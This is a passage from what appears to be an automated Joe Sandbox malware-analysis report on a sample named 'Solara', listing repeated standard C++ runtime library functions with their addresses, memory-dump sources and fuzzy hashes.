Instruction Fuzzy Hash: 4A0126358002259BCB05EBA0E816AAD7772FF80320F184108F911A7391CF709E42D791

Function 00C4A596 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A59D
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A5A7
int.LIBCPMT ref: 00C4A5BE

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A5F8
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A618
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A625

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: edda6433ac532a5ea1ffaec79dddeda1a0dae4f19afe27a09126a6d0e3afaaaf
Instruction ID: 8298d5399550dbf011041afa917a7bd8b88ccd8aa7f389be6cbd9fa70c57565c
Opcode Fuzzy Hash: edda6433ac532a5ea1ffaec79dddeda1a0dae4f19afe27a09126a6d0e3afaaaf
Instruction Fuzzy Hash: 1601F9359002269FCF05FBA4E856AFEB772BF84314F194008F910AB391DF349E069792

Function 00C4A501 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A508
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A512
int.LIBCPMT ref: 00C4A529

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A563
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A583
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A590

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 3c0da4356b171eeca44b64c812929e65800bb57f7cafb9ed35fd705fd3eaa38e
Instruction ID: 224e7c839fee6b85800d88ed61d0d4efb4ef7b7d5e6cfa3665664c51c75ae9ac
Opcode Fuzzy Hash: 3c0da4356b171eeca44b64c812929e65800bb57f7cafb9ed35fd705fd3eaa38e
Instruction Fuzzy Hash: 8801D2359002259BCB05EBA4E812BEE77B2BF84324F140508E910AB791DF349E0197A5

Function 00C3C6B0 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C6B7
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C6C1
int.LIBCPMT ref: 00C3C6D8

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C712
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C732
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C73F

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 19d817aa5cafaaa2e716dd61e90763f07d3bc0c1dae9a259cfc2ff5a16248ce8
Instruction ID: 16a6ab4a0c470d720dc1d494f971d965a5d476e06544d813320866d35aad26d6
Opcode Fuzzy Hash: 19d817aa5cafaaa2e716dd61e90763f07d3bc0c1dae9a259cfc2ff5a16248ce8
Instruction Fuzzy Hash: D201D6359102269BCF05FBA4E852AFD7772AF85310F144008F911A7391CF309E429B90

Function 00C3C61B Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C622
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C62C
int.LIBCPMT ref: 00C3C643

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C67D
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C69D
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C6AA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: bcafe41d31739b32c2d6c6ff8be9d6f55bb9bb6ebccdb93fe9945e9fb1f4a531
Instruction ID: 211f74b5554b8a531b478209596a10e9001c842c8c0812e239a2b92c5743b64c
Opcode Fuzzy Hash: bcafe41d31739b32c2d6c6ff8be9d6f55bb9bb6ebccdb93fe9945e9fb1f4a531
Instruction Fuzzy Hash: B601D2359102269BCF04FB64E856AED77B2AF84320F284008F911AB392CF709E429B91

Function 00C4A7EA Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A7F1
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A7FB
int.LIBCPMT ref: 00C4A812

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A84C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A86C
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A879

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 903a063b246025a6161f0bd731f808918c73ec6347db9f5cb7ee2ed866500ccd
Instruction ID: 2c2fb20069a44ffdce32d7e6a87fc909a42d9098849464215bf18637c8742825
Opcode Fuzzy Hash: 903a063b246025a6161f0bd731f808918c73ec6347db9f5cb7ee2ed866500ccd
Instruction Fuzzy Hash: 2001C035D4022A9BCB04EBA4E812AFE77B2FF84310F140008E911AB3D1CF309A46D792

Function 00C3C745 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C74C
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C756
int.LIBCPMT ref: 00C3C76D

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C7A7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C7C7
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C7D4

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 38827ae5a1478071991cd0687b68572e1eb9142daa1c65416eaf7ddd560e2801
Instruction ID: cd049dab87bdd3b20d6d80f9d4527a6f2302c39567ff945f6fc4f3ba01b214b0
Opcode Fuzzy Hash: 38827ae5a1478071991cd0687b68572e1eb9142daa1c65416eaf7ddd560e2801
Instruction Fuzzy Hash: 8E01D23690022AABCF05FBA4E855AFDB7B5AF85724F144008FA11AB7D1CF309E419B90

Function 00C4A755 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A75C
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A766
int.LIBCPMT ref: 00C4A77D

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A7B7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A7D7
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A7E4

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: f9813541688dec58828b8b0e0dc6727d7b7e6d86ddf420b2a5f1b41c2cc163b5
Instruction ID: 75045e0cc933e8b44e04a59ef81bcd5fbb89d427d6bd8c7e6714b1b7c8523d0f
Opcode Fuzzy Hash: f9813541688dec58828b8b0e0dc6727d7b7e6d86ddf420b2a5f1b41c2cc163b5
Instruction Fuzzy Hash: 3301D6359402299BCF05FBA4E816AAE77B1BF84320F140409F910A7791DF349E45E791

Function 00C3C999 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C9A0
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C9AA
int.LIBCPMT ref: 00C3C9C1

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C9FB
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CA1B
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CA28

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4c16639695510467d6cefff2f843cdaae3510fea3b8fc8b86cd8c8ed38123a65
Instruction ID: 4e47876e4acf3a1822e290e000dacc9606fcdfb8eeb3bddf602a2fc12e6ce1fc
Opcode Fuzzy Hash: 4c16639695510467d6cefff2f843cdaae3510fea3b8fc8b86cd8c8ed38123a65
Instruction Fuzzy Hash: 0601263690022A9BCB04FBA0E845BAD77B1AF80310F154108F910B7381CF349E01AB90

Function 00C3CAC3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CACA
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CAD4
int.LIBCPMT ref: 00C3CAEB

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CB25
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CB45
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CB52

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 52b8282cd5b4b42e41541fc874e01fdcc9c8bf15883a0785852254253426e136
Instruction ID: 5e2a5f76e2ab9f977fe2e7bcf4eeb0e0f58e740153fd7b5f08a590f1a02bd57f
Opcode Fuzzy Hash: 52b8282cd5b4b42e41541fc874e01fdcc9c8bf15883a0785852254253426e136
Instruction Fuzzy Hash: CA01D275D002259BCB04EB64E852AFEB771BF84314F144508F921AB791CF34AE42E791

Function 00C3CA2E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CA35
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CA3F
int.LIBCPMT ref: 00C3CA56

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CA90
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CAB0
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CABD

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: f9501568190ef6dfc6f8603c490bd9ec6611a653cc4a78f722824be6fbe86513
Instruction ID: 8769b54b2fff6868a6b41ba997a7abb98749837021510a098d9fa89f9866c277
Opcode Fuzzy Hash: f9501568190ef6dfc6f8603c490bd9ec6611a653cc4a78f722824be6fbe86513
Instruction Fuzzy Hash: DC01D239D10229ABCF04EBA4E855AAEB771AF85314F144409F911AB391DF309E42AB90

Function 00C3CB58 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CB5F
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CB69
int.LIBCPMT ref: 00C3CB80

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CBBA
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CBDA
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CBE7

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 14815eacfeea516c2c5d98a07a6a78aa7be438becce43198a99f931f175db6bc
Instruction ID: 28ba70a3c93e63436688471ebbd0bc1f58e8de9b7b24fe900510fa86616c92be
Opcode Fuzzy Hash: 14815eacfeea516c2c5d98a07a6a78aa7be438becce43198a99f931f175db6bc
Instruction Fuzzy Hash: EA01D235910225ABCB05EBA4E856AFEB7B1BF84314F144408FA11BB791CF309E42DB90

Function 00C3CED6 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CEDD
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CEE7
int.LIBCPMT ref: 00C3CEFE

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CF38
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CF58
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CF65

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: acab36eaac13cee5cdf4b89eaf4b393caa45e92f45694ac4e1c0552195f9bec0
Instruction ID: b8f4731887308c0e708adfb02048106a25fc37a447889111aaf3908678570f29
Opcode Fuzzy Hash: acab36eaac13cee5cdf4b89eaf4b393caa45e92f45694ac4e1c0552195f9bec0
Instruction Fuzzy Hash: 8B01F935910225ABCF05FBA4E855BFDB7B2AF84720F144108FA11B7391CF349E429790

Function 00C3CE41 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CE48
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CE52
int.LIBCPMT ref: 00C3CE69

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CEA3
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CEC3
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CED0

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: da52918a9cac64f1d81d0084ac5a5dedcb92ecc0f42f4b5be6b6d77006241548
Instruction ID: 8c2ae523f16e41f2cf957fc1454f7d9286b72c61cce956d848261b0f1c6f171e
Opcode Fuzzy Hash: da52918a9cac64f1d81d0084ac5a5dedcb92ecc0f42f4b5be6b6d77006241548
Instruction Fuzzy Hash: 1001F93591022A9BCF04FF64E855BFE7772AF84714F144018F920AB391CF309E459B90

Function 00C3CF6B Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CF72
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CF7C
int.LIBCPMT ref: 00C3CF93

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CFCD
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CFED
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CFFA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b869bb627d09f937c0a1416687f11d93201147c11d20b2ba19589628c24266aa
Instruction ID: 01453813c444677f38686b36305f2064485c1fbc1049cdb3c096f13b6a99a3bd
Opcode Fuzzy Hash: b869bb627d09f937c0a1416687f11d93201147c11d20b2ba19589628c24266aa
Instruction Fuzzy Hash: E501D639D102269BCB05FBA4E855EADB772AF94314F144509F911AB391CF309E469B90

Function 00C3D000 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D007
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D011
int.LIBCPMT ref: 00C3D028

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D062
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D082
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D08F

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: acb47a768c8efc3b281f04d6ce964fdb78c85eed648e9b722239a14db2676170
Instruction ID: a1330f18d2fe5fb22faf77f95016a95badc4a9990cb17dab704d00c64b789253
Opcode Fuzzy Hash: acb47a768c8efc3b281f04d6ce964fdb78c85eed648e9b722239a14db2676170
Instruction Fuzzy Hash: A001D6359102269BCF08FB64E811BBEBBB1AF94710F144008F911AB391CF359E429B90

Function 00C3D1BF Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D1C6
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D1D0
int.LIBCPMT ref: 00C3D1E7

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D221
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D241
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D24E

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 7daaa911a27e3b3ee2392d4b1ebc075e007a8eb1f51e8f83cfbaf60aaaeb4104
